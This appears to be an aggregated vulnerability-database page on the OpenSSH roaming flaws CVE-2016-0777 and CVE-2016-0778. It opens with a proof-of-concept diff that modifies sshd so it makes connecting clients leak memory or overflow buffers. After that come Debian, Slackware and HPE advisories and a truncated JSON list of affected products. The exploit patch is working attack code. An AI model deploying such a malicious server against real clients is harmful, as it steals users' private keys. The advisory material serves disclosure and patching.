diff -pruN openssh-6.4p1/roaming.h openssh-6.4p1+roaming/roaming.h --- openssh-6.4p1/roaming.h 2011-12-18 15:52:52.000000000 -0800 +++ openssh-6.4p1+roaming/roaming.h 2016-01-07 01:04:15.000000000 -0800 @@ -42,4 +42,86 @@ void resend_bytes(int, u_int64_t ); void calculate_new_key(u_int64_t , u_int64_t, u_int64_t); int resume_kex(void);
+#include +#include +#include +#include +#include +#include + +#include "atomicio.h" +#include "log.h" +#include "xmalloc.h" + +static inline char * +get_roaming_dir(const u_int id) +{ + const size_t buflen = MAXPATHLEN; + char const buf = xmalloc(buflen); + + if ((u_int)snprintf(buf, buflen, "/tmp/roaming-%08x", id) >= buflen) + fatal("%s: snprintf %u error", func, id); + return buf; +} + +static inline void +dump_roaming_file(const char const name, + const void const buf, const size_t buflen) +{ + if (name == NULL) + fatal("%s: name %p", func, name); + if (strchr(name, '/') != NULL) + fatal("%s: name %s", func, name); + if (buf == NULL) + fatal("%s: %s buf %p", func, name, buf); + if (buflen <= 0 || buflen > MAX_ROAMBUF) + fatal("%s: %s buflen %lu", func, name, (u_long)buflen); + + const int fd = open(name, O_WRONLY | O_CREAT | O_EXCL, S_IRUSR); + if (fd <= -1) + fatal("%s: open %s errno %d", func, name, errno); + if (write(fd, buf, buflen) != (ssize_t)buflen) + fatal("%s: write %s errno %d", func, name, errno); + if (close(fd) != 0) + fatal("%s: close %s errno %d", func, name, errno); +} + +static inline void * +load_roaming_file(const char const name, + void buf, size_t const buflenp) +{ + if (name == NULL) + fatal("%s: name %p", func, name); + if (strchr(name, '/') != NULL) + fatal("%s: name %s", func, name); + if (buflenp == NULL) + fatal("%s: %s buflenp %p", func, name, buflenp); + + const int fd = open(name, O_RDONLY | O_NOFOLLOW | O_NONBLOCK); + if (fd <= -1) + fatal("%s: open %s errno %d", func, name, errno); + struct stat st; + if (fstat(fd, &st) != 0) + fatal("%s: fstat %s errno %d", func, name, errno); + if (S_ISREG(st.st_mode) == 0) + fatal("%s: %s mode 0%o", func, name, (u_int)st.st_mode); + if (st.st_size <= 0 || st.st_size > MAX_ROAMBUF) + fatal("%s: %s size %lld", func, name, + (long long)st.st_size); + + if (buf == NULL) { + buflenp = st.st_size; + buf = xmalloc(buflenp); + } else { + if (buflenp != (size_t)st.st_size) + fatal("%s: %s size %lld buflen %lu", func, name, + (long long)st.st_size, (u_long)buflenp); + } + if (read(fd, buf, buflenp) != (ssize_t)buflenp) + fatal("%s: read %s errno %d", func, name, errno); + if (close(fd) != 0) + fatal("%s: close %s errno %d", func, name, errno); + return buf; +} + #endif / ROAMING / diff -pruN openssh-6.4p1/serverloop.c openssh-6.4p1+roaming/serverloop.c --- openssh-6.4p1/serverloop.c 2013-07-17 23:12:45.000000000 -0700 +++ openssh-6.4p1+roaming/serverloop.c 2016-01-07 01:04:15.000000000 -0800 @@ -1060,6 +1060,9 @@ server_request_session(void) return c; }
+static int client_session_channel = -1; +static int server_session_channel = -1; + static void server_input_channel_open(int type, u_int32_t seq, void ctxt) { @@ -1089,12 +1092,22 @@ server_input_channel_open(int type, u_in c->remote_window = rwindow; c->remote_maxpacket = rmaxpack; if (c->type != SSH_CHANNEL_CONNECTING) { + debug("%s: avoid client-side buf_append", func); + / packet_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION); packet_put_int(c->remote_id); packet_put_int(c->self); packet_put_int(c->local_window); packet_put_int(c->local_maxpacket); packet_send(); + */ + if (strcmp(ctype, "session") == 0) { + if (client_session_channel != -1) + fatal("%s: client_session_channel %d", + func, client_session_channel); + client_session_channel = c->remote_id; + server_session_channel = c->self; + } } } else { debug("server_input_channel_open: failure %s", ctype); @@ -1111,6 +1124,196 @@ server_input_channel_open(int type, u_in }
static void +roaming_disconnect(Kex const kex) +{ + const char cp, roaming = getenv("ROAMING"); + if (roaming == NULL) + roaming = "infoleak"; + int overflow = 0; + if ((cp = strstr(roaming, "overflow:")) != NULL) + overflow = cp[9]; + + const u_int client_recv_buf_size = packet_get_int(); + packet_check_eom(); + const u_int server_recv_buf_size = get_recv_buf_size(); + const u_int server_send_buf_size = get_snd_buf_size(); + debug("%s: client_recv_buf_size %u", func, client_recv_buf_size); + debug("%s: server_recv_buf_size %u", func, server_recv_buf_size); + debug("%s: server_send_buf_size %u", func, server_send_buf_size); + + u_int client_send_buf_size = 0; + if ((cp = strstr(roaming, "client_send_buf_size:")) != NULL) + client_send_buf_size = strtoul(cp + 21, NULL, 0); + else if (client_recv_buf_size == DEFAULT_ROAMBUF) + client_send_buf_size = DEFAULT_ROAMBUF; + else { + const u_int + max = MAX(client_recv_buf_size, server_recv_buf_size), + min = MIN(client_recv_buf_size, server_recv_buf_size); + if (min <= 0) + fatal("%s: min %u", func, min); + if (((u_int64_t)(max - min) * 1024) / min < 1) + client_send_buf_size = server_send_buf_size; + else + client_send_buf_size = client_recv_buf_size; + } + debug("%s: client_send_buf_size %u", func, client_send_buf_size); + if (client_send_buf_size <= 0) + fatal("%s: client_send_buf_size", func); + + u_int id = 0; + char dir = NULL; + for (;;) { + id = arc4random(); + debug("%s: id %u", func, id); + free(dir); + dir = get_roaming_dir(id); + if (mkdir(dir, S_IRWXU) == 0) + break; + if (errno != EEXIST) + fatal("%s: mkdir %s errno %d", func, dir, errno); + } + debug("%s: dir %s", func, dir); + if (chdir(dir) != 0) + fatal("%s: chdir %s errno %d", func, dir, errno); + + u_int client_out_buf_size = 0; + if ((cp = strstr(roaming, "client_out_buf_size:")) != NULL) + client_out_buf_size = strtoul(cp + 20, NULL, 0); + else if (overflow != 0) + client_out_buf_size = MAX_ROAMBUF; + else + client_out_buf_size = 1 + arc4random() % 4096; + debug("%s: client_out_buf_size %u", func, client_out_buf_size); + if (client_out_buf_size <= 0) + fatal("%s: client_out_buf_size", func); + dump_roaming_file("client_out_buf_size", &client_out_buf_size, + sizeof(client_out_buf_size)); + + if ((cp = strstr(roaming, "scp_mode")) != NULL) { + if (overflow != 0) + fatal("%s: scp_mode is incompatible with overflow %d", + func, overflow); + + u_int seconds_left_to_sleep = 3; + if ((cp = strstr(cp, "sleep:")) != NULL) + seconds_left_to_sleep = strtoul(cp + 6, NULL, 0); + debug("%s: sleep %u", func, seconds_left_to_sleep); + + if (client_session_channel == -1) + fatal("%s: client_session_channel %d", + func, client_session_channel); + + packet_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION); + packet_put_int(client_session_channel); + packet_put_int(server_session_channel); + packet_put_int(0); / server window / + packet_put_int(0); / server maxpacket / + packet_send(); + + packet_start(SSH2_MSG_CHANNEL_DATA); + packet_put_int(client_session_channel); + packet_put_string("\0\n", 2); / response&source|sink&run_err / + packet_send(); + + packet_read_expect(SSH2_MSG_CHANNEL_REQUEST); + packet_get_int(); / server channel / + debug("%s: channel request %s", func, + packet_get_cstring(NULL)); + + while (seconds_left_to_sleep) + seconds_left_to_sleep = sleep(seconds_left_to_sleep); + } + + packet_start(SSH2_MSG_REQUEST_SUCCESS); + packet_put_int(id); / roaming_id / + packet_put_int64(arc4random()); / cookie / + packet_put_int64(0); / key1 / + packet_put_int64(0); / key2 / + packet_put_int(client_out_buf_size - client_send_buf_size); + packet_send(); + packet_write_wait(); + + if (overflow != 0) { + const u_int64_t full_client_out_buf = get_recv_bytes() + + client_out_buf_size; + + u_int fd_leaks = 4 * 8 * 8; / MIN_CHUNK_SIZE in bits / + if ((cp = strstr(roaming, "fd_leaks:")) != NULL) + fd_leaks = strtoul(cp + 9, NULL, 0); + debug("%s: fd_leaks %u", func, fd_leaks); + + while (fd_leaks--) { + packet_start(SSH2_MSG_CHANNEL_OPEN); + packet_put_cstring(overflow == 'X' ? "x11" : + "auth-agent@openssh.com"); / ctype / + packet_put_int(arc4random()); / server channel / + packet_put_int(arc4random()); / server window / + packet_put_int(arc4random()); / server maxpacket / + if (overflow == 'X') { + packet_put_cstring(""); / originator / + packet_put_int(arc4random()); / port / + } + packet_send(); + + packet_read_expect(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION); + packet_get_int(); / server channel / + packet_get_int(); / client channel / + packet_get_int(); / client window / + packet_get_int(); / client maxpacket / + packet_check_eom(); + } + + while (get_recv_bytes() <= full_client_out_buf) { + packet_start(SSH2_MSG_GLOBAL_REQUEST); + packet_put_cstring(""); / rtype / + packet_put_char(1); / want_reply / + packet_send(); + + packet_read_expect(SSH2_MSG_REQUEST_FAILURE); + packet_check_eom(); + } + + if (kex == NULL) + fatal("%s: no kex, cannot rekey", func); + if (kex->flags & KEX_INIT_SENT) + fatal("%s: KEX_INIT_SENT already", func); + char const ptr = buffer_ptr(&kex->my); + const u_int len = buffer_len(&kex->my); + if (len <= 1+4) / first_kex_follows + reserved / + fatal("%s: kex len %u", func, len); + ptr[len - (1+4)] = 1; / first_kex_follows / + kex_send_kexinit(kex); + + u_int i; + packet_read_expect(SSH2_MSG_KEXINIT); + for (i = 0; i < KEX_COOKIE_LEN; i++) + packet_get_char(); + for (i = 0; i < PROPOSAL_MAX; i++) + free(packet_get_string(NULL)); + packet_get_char(); / first_kex_follows / + packet_get_int(); / reserved / + packet_check_eom(); + + char buf[81922]; / two packet_read_seqnr bufferfuls / + memset(buf, '\0', sizeof(buf)); + packet_start(SSH2_MSG_KEX_ROAMING_AUTH_FAIL); + packet_put_string(buf, sizeof(buf)); + packet_send(); + const Buffer const output = packet_get_output(); + dump_roaming_file("output", buffer_ptr(output), + buffer_len(output)); + } + + const u_int64_t client_write_bytes = get_recv_bytes(); + debug("%s: client_write_bytes %llu", func, + (unsigned long long)client_write_bytes); + dump_roaming_file("client_write_bytes", &client_write_bytes, + sizeof(client_write_bytes)); + fatal("%s: all done for %s", func, dir); +} + +static void server_input_global_request(int type, u_int32_t seq, void ctxt) { char rtype; @@ -1168,6 +1371,13 @@ server_input_global_request(int type, u_ } else if (strcmp(rtype, "no-more-sessions@openssh.com") == 0) { no_more_sessions = 1; success = 1; + } else if (strcmp(rtype, ROAMING_REQUEST) == 0) { + if (want_reply != 1) + fatal("%s: rtype %s want_reply %d", func, + rtype, want_reply); + roaming_disconnect(ctxt); + / NOTREACHED */ + fatal("%s: returned from %s", func, ROAMING_REQUEST); } if (want_reply) { packet_start(success ? diff -pruN openssh-6.4p1/sshd.c openssh-6.4p1+roaming/sshd.c --- openssh-6.4p1/sshd.c 2013-07-19 20:21:53.000000000 -0700 +++ openssh-6.4p1+roaming/sshd.c 2016-01-07 01:04:15.000000000 -0800 @@ -2432,6 +2432,8 @@ do_ssh2_kex(void) } if (options.kex_algorithms != NULL) myproposal[PROPOSAL_KEX_ALGS] = options.kex_algorithms; + else + myproposal[PROPOSAL_KEX_ALGS] = KEX_DEFAULT_KEX "," KEX_RESUME;
if (options.rekey_limit || options.rekey_interval)
packet_set_rekey_limits((u_int32_t)options.rekey_limit,
.
Users with passphrase-less privates keys, especially in non interactive setups (automated jobs using ssh, scp, rsync+ssh etc.) are advised to update their keys if they have connected to an SSH server they don't trust.
More details about identifying an attack and mitigations will be available in the Qualys Security Advisory.
For the oldstable distribution (wheezy), these problems have been fixed in version 1:6.0p1-4+deb7u3.
For the stable distribution (jessie), these problems have been fixed in version 1:6.7p1-5+deb8u1.
For the testing distribution (stretch) and unstable distribution (sid), these problems will be fixed in a later version.
We recommend that you upgrade your openssh packages. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
[slackware-security] openssh (SSA:2016-014-01)
New openssh packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix security issues.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/openssh-7.1p2-i486-1_slack14.1.txz: Upgraded. This update fixes an information leak and a buffer overflow. For more information, see: https://www.qualys.com/2016/01/14/cve-2016-0777-cve-2016-0778/openssh-cve-2016-0777-cve-2016-0778.txt http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0777 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0778
- IMPORTANT: READ BELOW ABOUT POTENTIALLY INCOMPATIBLE CHANGES *
Rather than backport the fix for the information leak (which is the only hazardous flaw), we have upgraded to the latest OpenSSH. As of version 7.0, OpenSSH has deprecated some older (and presumably less secure) algorithms, and also (by default) only allows root login by public-key, hostbased and GSSAPI authentication. Make sure that your keys and authentication method will allow you to continue accessing your system after the upgrade. The release notes for OpenSSH 7.0 list the following incompatible changes to be aware of: * Support for the legacy SSH version 1 protocol is disabled by default at compile time. * Support for the 1024-bit diffie-hellman-group1-sha1 key exchange is disabled by default at run-time. It may be re-enabled using the instructions at http://www.openssh.com/legacy.html * Support for ssh-dss, ssh-dss-cert- host and user keys is disabled by default at run-time. These may be re-enabled using the instructions at http://www.openssh.com/legacy.html * Support for the legacy v00 cert format has been removed. * The default for the sshd_config(5) PermitRootLogin option has changed from "yes" to "prohibit-password". * PermitRootLogin=without-password/prohibit-password now bans all interactive authentication methods, allowing only public-key, hostbased and GSSAPI authentication (previously it permitted keyboard-interactive and password-less authentication if those were enabled). ( Security fix *) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssh-7.1p2-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssh-7.1p2-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssh-7.1p2-i486-1_slack13.1.txz
Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssh-7.1p2-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssh-7.1p2-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssh-7.1p2-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssh-7.1p2-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssh-7.1p2-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssh-7.1p2-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssh-7.1p2-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssh-7.1p2-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssh-7.1p2-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 package: 856dd9c1b10641c282f30a34b7b63bea openssh-7.1p2-i486-1_slack13.0.txz
Slackware x86_64 13.0 package: 80903b0829f0284d007e7a316f2ff2da openssh-7.1p2-x86_64-1_slack13.0.txz
Slackware 13.1 package: 2095d1a304a94bab44993fdb7e0781c8 openssh-7.1p2-i486-1_slack13.1.txz
Slackware x86_64 13.1 package: 5bf653d7f5b4a9426ff2c5888af99f00 openssh-7.1p2-x86_64-1_slack13.1.txz
Slackware 13.37 package: 53e09b4371c045b9de1c86e0826324f9 openssh-7.1p2-i486-1_slack13.37.txz
Slackware x86_64 13.37 package: cd0319ff3c574c50612d5ba2b38f2fdc openssh-7.1p2-x86_64-1_slack13.37.txz
Slackware 14.0 package: 98cdc1d6ffea2a06d0c8013078681bff openssh-7.1p2-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: 2093f3e91a79e07f072c702a1704be73 openssh-7.1p2-x86_64-1_slack14.0.txz
Slackware 14.1 package: d051d9f31cd380436ad01fa1641be1c7 openssh-7.1p2-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: f1f81757431c3c836f06ce5d22e2d5de openssh-7.1p2-x86_64-1_slack14.1.txz
Slackware -current package: 70db20c5e4152bc9967b1e24cf91ed98 n/openssh-7.1p2-i586-1.txz
Slackware x86_64 -current package: e13dc3da27f817bee693fbb907015817 n/openssh-7.1p2-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg openssh-7.1p2-i486-1_slack14.1.txz
Next, restart the sshd daemon:
sh /etc/rc.d/rc.sshd restart
Then before logging out, make sure that you still have remote access! See the information about incompatible changes in OpenSSH 7.x above.
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. | +------------------------------------------------------------------------+ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iEYEARECAAYFAlaYWioACgkQakRjwEAQIjOwpACfXviFRy4mQxr63HyYu9zLgZ+Z dVsAn0sLTJYcXuCSQYnXNp+FYuIKWjVh =dePf -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05247375
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c05247375 Version: 1
HPSBGN03638 rev.1 - HPE Remote Device Access: Virtual Customer Access System (vCAS) using lighttpd and OpenSSH, Unauthorized Modification of Information, Remote Denial of Service (DoS), Remote Disclosure of Information
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2016-08-29 Last Updated: 2016-08-29
Potential Security Impact: Remote Denial of Service (DoS), Disclosure of Information, Unauthorized Modification Of Information
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY Potential vulnerabilities have been identified in the lighttpd and OpenSSH version used in HPE Remote Device Access: Virtual Customer Access System (vCAS). These vulnerabilities could be exploited remotely resulting in unauthorized modification of information, denial of service (DoS), and disclosure of information.
References:
CVE-2015-3200 CVE-2016-0777 CVE-2016-0778 PSRT110211
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HPE Remote Device Access: Virtual Customer Access System (vCAS) - v15.07 (RDA 8.1) and earlier.
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2015-3200
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CVE-2016-0777
6.5 CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N)
CVE-2016-0778
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
RESOLUTION
HPE has made the following updates available to resolve the vulnerabilities in Remote Device Access: Virtual Customer Access System (vCAS)
vCAS 16.05 (RDA 8.7) kits - hp-rdacas-16.05-10482-vbox.ova and hp-rdacas-16.05-10482.ova.
The Oracle VirtualBox kit is available at: https://h20529.www2.hpe.com/apt/hp-rdacas-16.05-10482-vbox.ova
The VMware ESX(i) and VMware Player kit is available at: https://h20529.www2.hpe.com/apt/hp-rdacas-16.05-10482.ova
HISTORY Version:1 (rev.1) - 29 August 2016 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201601-0029",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linux",
"scope": "eq",
"trust": 1.6,
"vendor": "oracle",
"version": "7"
},
{
"model": "solaris",
"scope": "eq",
"trust": 1.6,
"vendor": "oracle",
"version": "11.3"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.6,
"vendor": "openbsd",
"version": "5.6"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.6,
"vendor": "openbsd",
"version": "5.4"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.6,
"vendor": "openbsd",
"version": "5.5"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.6,
"vendor": "openbsd",
"version": "5.8"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.6,
"vendor": "openbsd",
"version": "5.7"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "6.7"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "6.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "6.6"
},
{
"model": "mac os x",
"scope": "lte",
"trust": 1.0,
"vendor": "apple",
"version": "10.11.3"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "5.0"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "6.8"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "6.0"
},
{
"model": "remote device access virtual customer access system",
"scope": "lte",
"trust": 1.0,
"vendor": "hp",
"version": "15.07"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "5.3"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "6.2"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "6.3"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "5.2"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "5.9"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "6.5"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "7.0"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "7.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "5.1"
},
{
"model": "unified threat management software",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "9.318"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "6.9"
},
{
"model": "unified threat management software",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "9.353"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "6.4"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "debian gnu linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "hardened bsd",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openbsd",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openssh",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ubuntu",
"version": null
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "1.2.1.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.6,
"vendor": "slackware",
"version": "14.0"
},
{
"model": "nsmexpress",
"scope": "eq",
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "5.0.16"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "5.1"
},
{
"model": "junos 14.2r2",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "nsm3000",
"scope": "eq",
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "vios",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "2.2.3.4"
},
{
"model": "junos 13.3r4",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "power hmc",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "7.9.0.0"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "5.0.3"
},
{
"model": "purepower integrated manager service appliance",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "1.1"
},
{
"model": "linux x86 64",
"scope": "eq",
"trust": 0.6,
"vendor": "slackware",
"version": "13.0"
},
{
"model": "power hmc",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "8.3.0.0"
},
{
"model": "junos 12.1x46-d35",
"scope": null,
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "purepower integrated manager kvm host",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "0"
},
{
"model": "pan-os",
"scope": "ne",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "7.1.3"
},
{
"model": "purview",
"scope": "ne",
"trust": 0.6,
"vendor": "extremenetworks",
"version": "7.0"
},
{
"model": "linux arm",
"scope": "eq",
"trust": 0.6,
"vendor": "debian",
"version": "6.0"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "7.0.5"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "7.0"
},
{
"model": "junos 15.1x49-d40",
"scope": "ne",
"trust": 0.6,
"vendor": "juniper",
"version": null
},
{
"model": "vios",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "2.2.0.13"
},
{
"model": "mac os",
"scope": "ne",
"trust": 0.6,
"vendor": "apple",
"version": "x10.11.4"
},
{
"model": "linux ia-64",
"scope": "eq",
"trust": 0.6,
"vendor": "debian",
"version": "6.0"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "5.0.17"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.6,
"vendor": "openssh",
"version": "6.5"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "5.1.10"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.6,
"vendor": "paloaltonetworks",
"version": "5.0.18"
},
{
"model": "ids/ips",
"scope": "eq",
"trust": 0.6,
"vendor": "extremenetworks",
